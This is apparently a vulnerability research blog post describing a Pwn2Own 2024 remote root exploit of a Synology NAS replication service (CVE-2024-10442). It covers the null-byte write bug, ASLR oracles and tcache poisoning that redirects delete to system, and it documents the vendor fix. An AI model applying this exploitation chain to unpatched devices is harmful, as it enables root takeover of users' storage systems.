Exploiting the Synology DiskStation with Null-byte Writes

In October, we attended Pwn2Own Ireland 2024 and successfully exploited the Synology DiskStation DS1823xs+ to obtain remote code execution as root. This issue has been fixed as CVE-2024-10442.

The DiskStation is a popular line of NAS (network-attached storage) products by Synology. It has been succesfully exploited a few times at Pwn2Own events in the past, though it remained untouched in the prior year’s event (Pwn2Own Toronto 2023). Then Ireland 2024 saw three successful entries, all using unique bugs.

This post will detail our experience researching the Synology DiskStation and writing an exploit against it for the event.

Prepping to throw an exploit at the Synology DiskStation, Pwn2Own Ireland 2024

Reviewing Synology Packages

As mentioned, the past year or two of Pwn2Own had garnered no entries against the Synology DiskStation. In 2024, ZDI opted to place a few non-default, but first-party packages authored by Synology in-scope for the competition:

For the Synology DiskStation target, the following packages will be installed and are in scope for contest:

MailPlus

Drive

Virtual Machine Manager

Snapshot Replication

Surveillance Station

Photos

“Packages” are optional add-on applications / services (etc.) that can be easily installed on the device via Synology’s Package Center in the DiskStation Manager.

For us, this meant more attack surface, and as this was the first year these packages were in-scope, we figured there was good opportunity to find some relatively shallow vulnerabilities, as these packages likely hadn’t seen as much security-oriented review. This turned out to be very true.

The first package we looked at was Virtual Machine Manager, which we installed directly from the built-in Package Center on a physical DiskStation.

We could then enumerate any new network listeners with netstat via an SSH shell we had on our test device. This revealed a handful of localhost-only services, save for a single service bound to all interfaces, running the following command (as root):

/var/packages/ReplicationService/target/sbin/synobtrfsreplicad --port 5566

This listener was actually part of Replication Service, a separate package which was a dependency of Virtual Machine Manager (and is also a dependency of Snapshot Replication). Our interest was piqued given the high privilege-level and ease of communication with this service.

The next step was to examine the binary. Since we had installed the service on a real device, we were able to pull the files via SSH.

Alternatively, software downloads are available directly from Synology for both DSM (the core operating system) and packages. An extraction tool can then be used to parse the custom Synology archives and spit out the contents of packages, firmware images, or updates. Note that this particular tool is an FFI wrapper around native first-party Synology shared libraries, which can be pulled off a real device, or extracted from a DSM archive with a separate tool.

Finding the Bug

With the relevant binaries in hand, we can start to look at the code for this TCP service listening on port 5566. The main binary synobtrfsreplicad is just a driver shim to invoke functionality in libsynobtrfsreplicacore.so.7, which starts the TCP listener.

The service is a minimal linux-based forking server, with the main process continually calling accept() and forking off a child process to handle each new remote client. In turn, the child process runs a basic command loop to parse incoming messages sent to the service.

Each command has a simple binary format, with an opcode optionally followed by a variably-sized data payload:

unsigned cmd // command opcode
unsigned seq // sequence number
unsigned len
char data[len]

Two globals are defined to facilitate parsing these command messages. One is for the command itself, and the other is a ring-buffer-esque structure to hold up to 3 variably-sized command payloads.

struct
{
    unsigned char sector; // ring buffer index
    char bufs[3][65536]; // ring buffer of 3 payloads
    unsigned buf_lens[3]; // populated lengths of 3 payloads
} g_recvbuf;

struct
{
    ReplicaCmdHeader header; // opcode, seq, len
    char *data; // will point into one of the 3 g_recvbuf bufs
} g_cmd;

The command loop for reading messages looks something like this:

void runCmdLoop() {
    while(1) {
        g_cmd.data = g_recvbuf.bufs[g_recvbuf.sector];
        int err = recvCmd(&g_cmd);
        if (err)
            bail;
        g_cmd.data[g_cmd.header.len] = 0;
        // ... handle cmd ...
    }
}

// function to read both the header and payload of a message
int recvCmd(ReplicaCmd* cmd) {
    int err = raw_tcp_recv(cmd->header, 12);
    if (err)
        return err;
    if (cmd->header.len > 0x10000)
        return err;
    // read actual payload data
    err = raw_tcp_recv(cmd->data, cmd->header.len);
    // ...
}

If the attacker-supplied length is too large, recvCmd bails out without reading any payload. However, its return value is zero, indicating no error, a bit odd considering the header length was invalid… Back in the caller, which is unaware of any error, things proceed normally, and the command payload is null terminated, using the arbitrarily large header length.

This bug is trivial enough that for our initial POC, we can use netcat to send a message consisting solely of A’s (at least 12), in classic pwnable fashion:

Unless you’re attached to the service using gdb, there’s no on-device indication that anything has gone wrong. The fault doesn’t seem to be logged to syslog or any other DSM logging facilities, and due to the nature of a forking server, there is no immediate loss of functionality.

The primitive afforded by this vulnerability will allow us to make repeated null byte writes into arbitrary offsets of the shared library’s BSS (data segment). Very CTF-like. Although the vulnerability is rather simple, the exploitation of it will be a bit more interesting.

Regardless, as all mitigations were enabled, we first had to somehow turn this into an info leak.

Forking Server

Before we move on, recall that we’re dealing with a forking server, which can be very useful for breaking ASLR. Each child process that is forked will have the same exact address space as the parent, and crashing them has no consequences: we simply reconnect to the service and get a clean slate, in the form of a new child process. A bit like a time loop, each connection is an opportunity to glean new information about the address space in a cumulative manner.

At a high level, each iteration has the following structure:

Guess something (e.g. an address)
Have the binary use the guessed value such that it will behave differently if it’s correct or not (e.g. a wrong address will crash)
Observe the binary’s behavior to determine if the value was correct
If correct, we have found the right value. Otherwise, repeat with the next guess

We’ll see how this can be applied to this specific binary as we continue.

Functionality Overview

Since the bug in question occurs during input parsing, we hadn’t yet explored much of the program’s functionality, which we’ll need to leverage in constructing an exploit later on.

After reading the command from the network, the command loop has a switch-case over the supplied opcode. Opcodes that require input parse them from the variable-length command payload. We looked through all the available opcodes to get a rough idea of their functions:

CMD_DSM_VER : no inputs
- returns DSM version numbers
CMD_SSL : initializes SSL for the connection
CMD_TEST_CONNECT
CMD_NOP
CMD_VERSION : input integer
- sets the “version” of the connection for compatibility differences
CMD_TOKEN : input string “token” which must exist as a key in a JSON file on disk
- performs initialization and sets the global std::string g_token
CMD_NAME : input string “name”
- can potentially perform btrfs-related operations, and/or use g_token to modify the JSON file
CMD_SEND : input raw data
- proxies input to a file descriptor, seemingly setup elsewhere as a pipe to a btrfs command
CMD_UPDATE
CMD_STOP : input token string
- removes token from JSON
CMD_COUNT
CMD_CLR_BKP
CMD_SYNCSIZE
CMD_END

It soon became clear that many of these code paths hinged on providing a valid “token,” which was supposed to already exist in a JSON file at /usr/syno/etc/synobtrfsreplica/btrfs_snap_replica_recv_token. The JSON is used as a simple key-value store of attributes, where the tokens are the keys:

{
    "<token>": {"<attribute>":value, ... other attributes ...},
    ... other tokens ...
}

Presumably, some external service hands out these tokens and writes to the file, but where this happened was unclear to us.

However, there is one code path that allows adding tokens to the JSON file, possibly in an unintended way. The CMD_NAME opcode uses the current g_token, and writes an attribute to the file, with two important nuances:

it does not check if g_token was ever initialized (i.e. with CMD_TOKEN)
if the token did not already exist as a key in the JSON object, setting the attribute adds it

Normally, the uninitialized g_token will just be an empty string, but with memory corruption in play, all bets are off, and we’ll see how this proves useful later on.

ASLR Oracle #1: Freeing a Fake Heap Chunk

Our primitive is a null byte write, where we supply an arbitrary offset into a command payload buffer. The offset is unsigned, so we can only write nulls to memory following the payload buffer.

This brings the question of what resides after the payload buffer, which will be one of the three 0x10000-sized buffers in the g_recvbuf global in the shared library’s BSS. There aren’t many globals except for a handful of std::string instances, which have the following structure:

struct std::string {
    char* ptr; // for short strings, points into inline_buffer
    unsigned long length;
    char inline_buffer[16];
}

The default constructor sets the length to 0, and points the char* at the inline buffer. In other words, we’ll have a bunch of std::string instances in the BSS with pointers set to their own BSS address, plus the offset 16.

Now, consider if we use our null write to zero out the two lowest bytes of one of these pointers. The payload buffer that precedes it is 0x10000 bytes, which is large enough to guarantee that the partially-nulled BSS pointer points somewhere within this buffer, although we don’t know the exact offset.

Since ASLR has page granularity (12 bits), there will be 4 bits (one nibble) of entropy in this offset (i.e. it can be 0, 0x1000, 0x2000, … 0xf000).

One of the global strings we can corrupt is _gSnapRecvPath, which can be re-assigned as one of the operations performed by the CMD_NAME command.

When re-assigning a std::string, if the char* is not pointing at the inline buffer, delete will be called on the old (now corrupted) value before assigning the new one. This lets us call free on a fake chunk within the payload buffer. We naturally control the contents of this buffer with our command payloads.

When free is invoked, if the fake chunk has a small-enough size, it will be placed into the glibc tcache. Alternatively, if the size is invalid (e.g. zero), free will call abort, crashing the process. This creates our first oracle, which we can combine with the forking-server behavior to determine which of the 16 possible offsets (0, 0x1000, … 0xf000) the fake chunk resides at.

For each of the 16 possible offsets:

Populate the payload buffer with padding up to the guessed offset, followed by the fake chunk’s metadata (which is just a fake size value)
Trigger the bug twice to null out the two low bytes of the char* for _gSnapRecvPath
Use CMD_NAME to free the corrupted char*, which may or may not be pointing at the fake chunk placed at the guessed offset
- if the socket remains connected and a response is sent, the guessed offset was correct
- if the socket is closed (i.e. abort was called), the guess was incorrect; try again with the next offset

We have now resolved one nibble of ASLR entropy and can reliably free a fake chunk in the payload buffer, which will be placed into the tcache.

ASLR Oracle #2: Leaking Tokens

The tcache is a singly-linked list of free chunks, and each free chunk has a next pointer. Due to some hardening attempts in glibc, the next pointer is populated like so:

chunk->next = (&chunk->next >> 12) ^ next

In our case, the tcache list will previously be empty (next = 0), so the value written will be &chunk->next >> 12. In other words, we’ve placed a shifted BSS pointer into the payload buffer. We’ll now want to figure out some way to leak this value.

Once the fake chunk has been freed and the shifted BSS pointer written, we’ll null out the low 2 bytes of the char* of a second global std::string, g_token. This corruption will make g_token point at the same exact spot as _gSnapRecvPath. That is, at the shifted BSS pointer.

Recall our earlier functionality discussion of CMD_NAME, which can add an unintialized g_token to the JSON file on disk. This is where that fact proves useful, since instead of the “uninitialized” g_token holding an empty string, it now points at the shifted BSS pointer. Triggering this code path, the JSON file now contains the value we want to leak.

Also note that before writing g_token out to disk, we can trigger the null byte write an additional time to truncate the shifted BSS pointer. In this way, we can write out each segment of the pointer. For example, if the shifted pointer is 0x766554433, we can write out each segment from 33, 3344, … to the full 3344556607.

Once the JSON file contains the leak, we can use CMD_TOKEN as intended, which expects a single string parameter indicating the token to use. This token will be looked up in the JSON file, and different error codes will be returned based on whether it was found or not. This creates our second oracle, which we can use to implement a byte-by-byte brute force:

Loop b from 0 to 4 for each of the 5 bytes of the shifted BSS pointer:
1. Truncate the pointer to length b+1, then write the truncated segment into the JSON file
2. Loop over possible bytes 0 - 0xff:
  - send CMD_TOKEN with the guessed byte (prepended with the bytes already known from previous iterations, of length b)
  - the returned error code will indicate if the supplied byte was correct
  - if correct, we’ve found the byte at index b of the shifted pointer
  - otherwise, keep trying with the next possible byte

Once this byte-by-byte brute force is complete, we’ll have leaked the shifted BSS pointer, which gives us the base address of the shared library. Since mmap mappings are contiguous in virtual memory, this also gives us the address of all shared libraries, most notably libc.

Hijacking Control Flow

Armed with a leak, we are ready to craft a final payload to hijack control flow.

We already have the ability to free a fake chunk in the payload buffer, and by sending additional commands, we can arbitrarily corrupt this free chunk. At this point, we can abuse the tcache linked list in the standard way:

Corrupt the fake chunk’s next pointer with an arbitrary address
Allocate something of the same size as the fake chunk
- malloc will return the fake chunk, then set the new head of the tcache list to the arbitrary address
Allocate the same size again to have malloc return the arbitrary address

We just have to find some code that matches this pattern of two consecutive allocations. Luckily, it turns out that the CMD_TOKEN handler fits this pattern, and after the two allocations are performed, a std::string temporarily containing our input parameter is destructed, invoking delete on a char* with our input.

This brings us to the following strategy:

Corrupt the fake tcache chunk’s next pointer to point near the shared library’s GOT entry for delete
Send a CMD_TOKEN command
The handler will allocate twice from the corrupted tcache, overwriting the GOT entry for delete with system
The subsequent destructor calls delete, which instead invokes system with the controlled input string

From here it’s game over. We can simply execute /bin/sh and redirect stdio to the client socket that’s already connected (avoiding the need for a connect-back).

The full exploit code for our submission has been made available here.

The Fix

The vulnerability was assigned CVE-2024-10442. Synology released a patch relatively quickly for Replication Service on November 5th 2024 (Pwn2Own Ireland took place on October 22nd), which you can find the advisory for here. ZDI’s advisory can be found here. The patch modified the recvCmd function to return an error instead of zero if the supplied header length is too large.

if (cmd->header.len > 0x10000)
    return 1; // instead of previous return 0

The caller then detects this error and bails instead of continuing to process the invalid command.

Conclusion

Although easy to find, this vulnerability was interesting to exploit, in that the null byte write was relatively weak as a primitive. It felt like the sort of bug you’d find in a CTF challenge, and the tcache manipulation and brute force oracles matched the CTF vibe as well.

On a more serious note, even though it’s in a non-default package, the presence of such a simple vulnerability in a remotely accessible service (running as root) is a bit concerning, especially considering that Synology is a fairly popular consumer and business oriented NAS, and it’s not uncommon for these devices to be exposed to the internet.

ENGINEERING BLOG